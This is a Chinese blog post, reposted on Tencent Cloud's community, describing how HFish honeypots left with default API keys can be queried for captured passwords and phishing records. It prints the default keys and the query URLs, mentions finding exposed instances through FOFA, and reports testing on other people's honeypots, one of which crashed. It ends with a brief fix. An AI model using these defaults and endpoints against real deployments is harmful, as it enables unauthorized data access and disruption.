前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >渗透测试|利用HFish蜜罐暴露的接口密钥获取所有钓鱼信息

渗透测试|利用HFish蜜罐暴露的接口密钥获取所有钓鱼信息

作者头像
TRY博客-简单的网络技术
发布2022-09-08 11:36:34
1K0
发布2022-09-08 11:36:34
举报
文章被收录于专栏:用户7692554的专栏

至少我们曾经在一起过。

来自:一言

var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();

前言

相信大家都搭建或者了解过HFish蜜罐,然后今天看到大佬说让尽快修改蜜罐里的api密钥,因为基本上大家用docker搭建蜜罐后就没怎么管过了。所以里面的key应该是和官网的一样的。[aru_128]

官方默认的api密钥如下。

代码语言:javascript
复制
report_key = 9cbf8a4dcb8e30682b927f352d6559a0   # API 上报认证秘钥
query_key = 585e2ba265d965b1929148d0f0e33133    # API 查询认证秘钥

然后在这里,我随便找了个蜜罐进行测试。

一、查看上报的Key

1.先打开蜜罐的web蜜罐页面,如下图,默认端口是9000,这里我改成了80端口。

2.在js文件里找到上报的key。

温馨提示

获取到这个key我们可以干什么?1.猜测对方使用的也是官方默认的查询认证密钥 2.利用这个key给对方发送垃圾数据[aru_150]

二、利用接口查询蜜罐信息

根据官方的api查询例子,可以查询以下信息。[aru_158]

1.获取钓到的账号密码

代码语言:javascript
复制
http://蜜罐地址:9001/api/v1/get/passwd_list?key=X85e2ba265d965b1929148d0f0e33133            #get请求,这里用的是默认的key

2.获取全部钓鱼信息

代码语言:javascript
复制
http://蜜罐地址:9001/api/v1/get/fish_info?key=X85e2ba265d965b1929148d0f0e33133        #get请求,这里用的是默认的key

这里测试的时候,还找了个表哥的来进行测试,好像他的蜜罐信息比较大,在获取全部钓鱼信息的时候直接让服务器蹦了~

在fofa上找到的几个地址,貌似大部分都还使用的是默认的key。

三、修复方式

[aru_36]修改上报认证秘钥和查询密钥即可,web蜜罐建议可以不用。[aru_26]

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020-04-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 至少我们曾经在一起过。
    • 前言
      • 一、查看上报的Key
        • 二、利用接口查询蜜罐信息
          • 三、修复方式
          相关产品与服务
          容器服务
          腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档